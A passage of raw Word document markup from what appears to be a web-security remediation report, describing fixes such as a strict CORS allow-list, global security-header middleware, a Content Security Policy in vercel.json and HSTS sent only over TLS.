ihchzJDO&#10;Hm/Ampn13XjFlT5xZmYTb36xAuY03kNmQ8ntyzcuvT0xNzv+oXHC25L0u73dXhVDRTsGX1ScO5MR&#10;Qicm727v43scEJBUr2xwDB8VDhl2SNpH070s4H6GpO37AvAOhJ5Fox2+gVcRhjnK1ixfxOaEdzIS&#10;ApcfUoPPAMyjf7KYd8b4G7WGh9X6LwAAAP//AwBQSwMEFAAGAAgAAAAhAIbzyiDhAAAACQEAAA8A&#10;AABkcnMvZG93bnJldi54bWxMj0FPg0AQhe8m/ofNmHizC0UqpQxN06inxsTWxPS2hSmQsruE3QL9&#10;944nPU7my3vfy9aTbsVAvWusQQhnAQgyhS0bUyF8Hd6eEhDOK1Oq1hpCuJGDdX5/l6m0tKP5pGHv&#10;K8EhxqUKofa+S6V0RU1auZntyPDvbHutPJ99JctejRyuWzkPgoXUqjHcUKuOtjUVl/1VI7yPatxE&#10;4euwu5y3t+Mh/vjehYT4+DBtViA8Tf4Phl99VoecnU72akonWoRkHj0zihCHvImBZLlYgjghvEQx&#10;yDyT/xfkPwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAA&#10;AAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAA&#10;AAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCG/cOeVAMAAKAJAAAOAAAAAAAA&#10;AAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCG88og4QAAAAkBAAAPAAAA&#10;AAAAAAAAAAAAAK4FAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAvAYAAAAA&#10;">
                <v:shape id="Shape 2048" o:spid="_x0000_s1027" style="position:absolute;width:466725;height:142875;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="4667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jQhxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9NT8JA&#10;EL2b8B82Y+LFwFYUQyoLMUYMBw5QUa+T7tht6M7W7kDLv3cPJh5f3vdiNfhGnamLdWADd5MMFHEZ&#10;bM2VgcP7ejwHFQXZYhOYDFwowmo5ulpgbkPPezoXUqkUwjFHA06kzbWOpSOPcRJa4sR9h86jJNhV&#10;2nbYp3Df6GmWPWqPNacGhy29OCqPxckbKH5uT/Pt50xetx/u6/7ytlvLpjfm5np4fgIlNMi/+M+9&#10;sQam2UOam96kJ6CXvwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQA4UjQhxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l457200,v2630,,4875,930,6735,2791c465795,4651,466725,6896,466725,9525r,123825c466725,135979,465795,138224,463935,140084v-1860,1861,-4105,2791,-6735,2791l9525,142875v-2631,,-4876,-930,-6736,-2791c929,138224,,135979,,133350l,9525c,6896,929,4651,2789,2791,4649,930,6894,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,466725,142875"/>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CORS origins from an explicit </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FRONTEND_URLS</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow-list with </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>no wildcard fallback</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a missing environment variable must fail closed, not silently restore the vulnerability. A global </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SecurityHeaders</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> middleware registered in the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>global</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> stack rather than a route group, so 404s, 405s, throttle 429s and exception responses are covered too. A </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>headers</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> block in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1530297C" w14:textId="77777777" w:rsidR="001244A6" w:rsidRPr="005C54CB" w:rsidRDefault="001244A6" w:rsidP="001244A6">
      <w:pPr>
        <w:spacing w:after="190" w:line="259"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0928" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2AB8DEBE" wp14:editId="1145DC18">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>18157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-19150</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="695325" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27002" name="Group 27002"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="695325" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="695325" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2051" name="Shape 2051"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="695325" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="695325" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="685800" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="688430" y="0"/>
                                  <a:pt x="690675" y="930"/>
                                  <a:pt x="692535" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="694395" y="4651"/>
                                  <a:pt x="695325" y="6896"/>
                                  <a:pt x="695325" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="695325" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="695325" y="135992"/>
                                  <a:pt x="694395" y="138224"/>
                                  <a:pt x="692535" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="690675" y="141945"/>
                                  <a:pt x="688430" y="142875"/>
                                  <a:pt x="685800" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>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2D73D1E" id="Group 27002" o:spid="_x0000_s1026" style="position:absolute;margin-left:1.45pt;margin-top:-1.5pt;width:54.75pt;height:11.25pt;z-index:-251415552" coordsize="6953,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gsPwMAACgJAAAOAAAAZHJzL2Uyb0RvYy54bWykVm1vmzAQ/j5p/wHxfeUlkAJqUmnr2i/T&#10;Vq3dD3AcE5AMRrbztl+/84EdaNJqavOBGN+L73nuzsfN7aHh3o5JVYt24UdXoe+xlop13W4W/p/n&#10;+y+Z7ylN2jXhomUL/8iUf7v8/Olm3xUsFpXgayY9cNKqYt8t/ErrrggCRSvWEHUlOtaCsBSyIRpe&#10;5SZYS7IH7w0P4jCcB3sh150UlCkFu3e90F+i/7JkVP8qS8W0xxc+xKbxKfG5Ms9geUOKjSRdVdMh&#10;DPKOKBpSt3Coc3VHNPG2sj5z1dRUCiVKfUVFE4iyrClDDIAmCl+geZBi2yGWTbHfdI4moPYFT+92&#10;S3/uHmT31D1KYGLfbYALfDNYDqVszD9E6R2QsqOjjB20R2FznqezOPU9CqIoibPrtKeUVsD7mRWt&#10;vr9pF9hDg0ko+w6KQ53wq4/hf6pIx5BWVQD+R+nV64Ufh2nkey1poEpRw8MdpAX1HEmqUMDXxxhy&#10;SElBt0o/MIFUk90PpfuaXNsVqeyKHlq7lFDZb9Z0R7SxM1Gapbc/5apyqTLSRuzYs0A9bRKWpyaf&#10;NtMQ50mBt2PFeZZmIfTUSNUq0O2qpl/Z36l6lsxG6hAXnjfPwzlUjXGTgxzBW0mcznpJfJ1HRgTh&#10;TH1P36xdMst7u2QOSZ247MsVDptn+fwVEVJw6TSLz57jnEWz2SzF4CFCq3U5tpFNmufxNAQXeDTL&#10;4jiZCh0bURKGGQr/kw/HcJREeTK06AAic2kZ968VuhSfhGdnWry9jaufiYXVuchJNmTrZGGLA/LX&#10;l8x54FASVvQqG/bUPrJB/VKqLimOqsCK7X/vz0Uwqk6rcQmnA/Oyzi3+SfU7Hm1ZTV1SLhTra9T0&#10;N7aG63lM0elW4a1pf4BPCYzYkhONs6qpNcxeXjdwH8TXIfRy74+34M3cuf01hyt95MzcEbz9zUq4&#10;L3EemA0lN6tvXHo7YiYs/tA54V1Fht3B76CKoaIfY1/WnDuXEZpOXH6/u4/vsVEB1KBs7BgOd2cZ&#10;9pZ0iKaf8DAnAbSd82DvjPBk0Wpn38LXCYY5QmuWK7E+4mxEQmAIITU4jhHH8Olg5v34HbVOHzjL&#10;fwAAAP//AwBQSwMEFAAGAAgAAAAhACRjd3DeAAAABwEAAA8AAABkcnMvZG93bnJldi54bWxMj0Fr&#10;wkAQhe+F/odlCr3pJrGWGrMRkbYnKaiF4m3NjkkwOxuyaxL/fcdTe3vDe7z3TbYabSN67HztSEE8&#10;jUAgFc7UVCr4PnxM3kD4oMnoxhEquKGHVf74kOnUuIF22O9DKbiEfKoVVCG0qZS+qNBqP3UtEntn&#10;11kd+OxKaTo9cLltZBJFr9Lqmnih0i1uKiwu+6tV8DnoYT2L3/vt5by5HQ/zr59tjEo9P43rJYiA&#10;Y/gLwx2f0SFnppO7kvGiUZAsOKhgMuOP7nacvIA4sVjMQeaZ/M+f/wIAAP//AwBQSwECLQAUAAYA&#10;CAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBL&#10;AQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BL&#10;AQItABQABgAIAAAAIQDIgKgsPwMAACgJAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnht&#10;bFBLAQItABQABgAIAAAAIQAkY3dw3gAAAAcBAAAPAAAAAAAAAAAAAAAAAJkFAABkcnMvZG93bnJl&#10;di54bWxQSwUGAAAAAAQABADzAAAApAYAAAAA&#10;">
                <v:shape id="Shape 2051" o:spid="_x0000_s1027" style="position:absolute;width:6953;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6953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RlxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/disIw&#10;FITvBd8hHGHvNFXsItUoIrgoKviH14fm2Babk26T1fr2ZkHwcpiZb5jJrDGluFPtCssK+r0IBHFq&#10;dcGZgvNp2R2BcB5ZY2mZFDzJwWzabk0w0fbBB7offSYChF2CCnLvq0RKl+Zk0PVsRRy8q60N+iDr&#10;TOoaHwFuSjmIom9psOCwkGNFi5zS2/HPKLhu57G+DX/T/drK9U+x2V3inVbqq9PMxyA8Nf4TfrdX&#10;WsEgivvw/yY8ATl9AQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAEerZGXEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m9525,l685800,v2630,,4875,930,6735,2791c694395,4651,695325,6896,695325,9525r,123825c695325,135992,694395,138224,692535,140084v-1860,1861,-4105,2791,-6735,2791l9525,142875v-2630,,-4875,-930,-6735,-2791l,133350,,9525,2790,2791c4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,695325,142875"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vercel.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a real CSP, which is also the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>defence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-in-depth layer behind V-13.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B4395C"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 xml:space="preserve">HSTS is emitted </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>only</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> over TLS: RFC 6797 §7.2 forbids sending it over plain </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HTTP, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> emitting it on a local dev server would pin developers' browsers to HTTPS for localhost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64096AEB" w14:textId="77777777" w:rsidR="001244A6" w:rsidRPr="005C54CB" w:rsidRDefault="001244A6" w:rsidP="001244A6">
      <w:pPr>
        <w:spacing w:after="100"/>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1952" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4019399E" wp14:editId="22C44561">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>951607</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-12234</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="571500" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27003" name="Group 27003"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="571500" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="571500" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2060" name="Shape 2060"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="571500" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="571500" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="561975" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="564605" y="0"/>
                                  <a:pt x="566850" y="930"/>
                                  <a:pt x="568710" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="570570" y="4651"/>
                                  <a:pt x="571500" y="6896"/>
                                  <a:pt x="571500" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="571500" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="571500" y="126454"/>
                                  <a:pt x="570570" y="128699"/>
                                  <a:pt x="568710" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="566850" y="132420"/>
                                  <a:pt x="564605" y="133350"/>
                                  <a:pt x="561975"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1F2C8A9" id="Group 27003" o:spid="_x0000_s1026" style="position:absolute;margin-left:74.95pt;margin-top:-.95pt;width:45pt;height:10.5pt;z-index:-251414528" coordsize="5715,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xoUAMAAKAJAAAOAAAAZHJzL2Uyb0RvYy54bWykVslu2zAQvRfoPwi6N1psybYQO0Cb5VK0&#10;QZN+AENRlgBKFEh669d3OBIpyQ6CNvFBJjnzZnkzXK5vjjX39kyqSjRrP7oKfY81VORVs137v5/v&#10;vyx9T2nS5ISLhq39E1P+zebzp+tDm7FYlILnTHpgpFHZoV37pdZtFgSKlqwm6kq0rAFhIWRNNEzl&#10;NsglOYD1mgdxGKbBQci8lYIypWD1thP6G7RfFIzqn0WhmPb42ofYNH4lfl/MN9hck2wrSVtWtA+D&#10;vCOKmlQNOHWmbokm3k5WF6bqikqhRKGvqKgDURQVZZgDZBOFZ9k8SLFrMZdtdti2jiag9oynd5ul&#10;P/YPsn1qHyUwcWi3wAXOTC7HQtbmH6L0jkjZyVHGjtqjsJgsoiQEYimIotlslvSU0hJ4v0DR8u5N&#10;XGCdBpNQDi00hxryVx/L/6kkLUNaVQb5P0qvytd+HKaQR0Nq6FLU8HAFaUE9R5LKFPD1MYZcpiSj&#10;O6UfmECqyf670l1P5nZESjuix8YOJXT2mz3dEm1wJkoz9A5DrUpXKiOtxZ49C9TTpmCrJE58z1Ya&#10;4hwUeDNWTNJotZiqWgW6e6noV/Znqj5Pw5E6xIX+kjRdQtcYj6tZ3z1WslxEnSRerCKzVyGcqe3p&#10;rMctwmTR4eZpgjjnrG9XcJYuV2m3/S2q62QTh6HgNW82vwtEFM+WDmO1Xo/NeYnidJ7MpyG4wKN4&#10;ma5WE2Hq2IhmYZKg8N/4GBiOZvE8PiPZlWW8f20FXIkH4YVPm2+Hcf0zQVid1ziBSnR9MSBsvaB+&#10;XSEvA4eWsKL/YsM0mWm2S4bt+nlZ7PqoxNM0bHIdAZ36qIeseAoaK5/3oo3xvH1dzv+1HxyJZ/vL&#10;8T5pCFc/XL0oNuVCsW5vmHMFt6Q7a1B7OM14Y44d4IMSuNoLTjTekXWl4c7nVW2KsAjh+ujs8Qas&#10;mbO+O15xpE+cmbOJN79YAec03kNmQcntyzcuvT0xNzv+0DjhbUn61d5ur4qhoh2DLyrOnckIoROT&#10;d7f38T0eEJBUr2xwDB8VDhl2SNpH070s4H6GpO37AvAOhJ5Fox2+gVcRhjnK1gxfRH7COxkJgcsP&#10;qcFnAObRP1nMO2M8R63hYbX5CwAA//8DAFBLAwQUAAYACAAAACEAvZvfad4AAAAJAQAADwAAAGRy&#10;cy9kb3ducmV2LnhtbEyPQUvDQBCF74L/YRnBW7vZVsXEbEop6qkItoJ422anSWh2NmS3SfrvnZ70&#10;NLx5jzff5KvJtWLAPjSeNKh5AgKp9LahSsPX/m32DCJEQ9a0nlDDBQOsitub3GTWj/SJwy5Wgkso&#10;ZEZDHWOXSRnKGp0Jc98hsXf0vTORZV9J25uRy10rF0nyJJ1piC/UpsNNjeVpd3Ya3kczrpfqddie&#10;jpvLz/7x43urUOv7u2n9AiLiFP/CcMVndCiY6eDPZINoWT+kKUc1zBRPDiyW18WBnVSBLHL5/4Pi&#10;FwAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29u&#10;dGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAA&#10;LwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAItr3GhQAwAAoAkAAA4AAAAAAAAAAAAAAAAA&#10;LgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAL2b32neAAAACQEAAA8AAAAAAAAAAAAA&#10;AAAAqgUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAC1BgAAAAA=&#10;">
                <v:shape id="Shape 2060" o:spid="_x0000_s1027" style="position:absolute;width:5715;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="571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iNkwgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/Pa8Iw&#10;FL4P/B/CG+wimliZzM4oIgxku2id90fzbEqbl9JErf/9chh4/Ph+rzaDa8WN+lB71jCbKhDEpTc1&#10;Vxp+T1+TDxAhIhtsPZOGBwXYrEcvK8yNv/ORbkWsRArhkKMGG2OXSxlKSw7D1HfEibv43mFMsK+k&#10;6fGewl0rM6UW0mHNqcFiRztLZVNcnYZmP2++f9RyPH6Y3dkesvq9mRdav70O208QkYb4FP+790ZD&#10;phZpf3qTnoBc/wEAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBlViNkwgAAAN0AAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m9525,l561975,v2630,,4875,930,6735,2791c570570,4651,571500,6896,571500,9525r,114300c571500,126454,570570,128699,568710,130559v-1860,1861,-4105,2791,-6735,2791l9525,133350v-2630,,-4875,-930,-6735,-2791c930,128699,,126454,,123825l,9525c,6896,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,57150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2976" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5EA6720D" wp14:editId="3272586E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1951732</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-12234</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="923925" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27004" name="Group 27004"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="923925" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="923925" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2063" name="Shape 2063"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="923925" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="923925" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="914400" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="917030" y="0"/>
                                  <a:pt x="919275" y="930"/>
                                  <a:pt x="921135" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="922995" y="4651"/>
                                  <a:pt x="923925" y="6896"/>
                                  <a:pt x="923925" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="923925" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
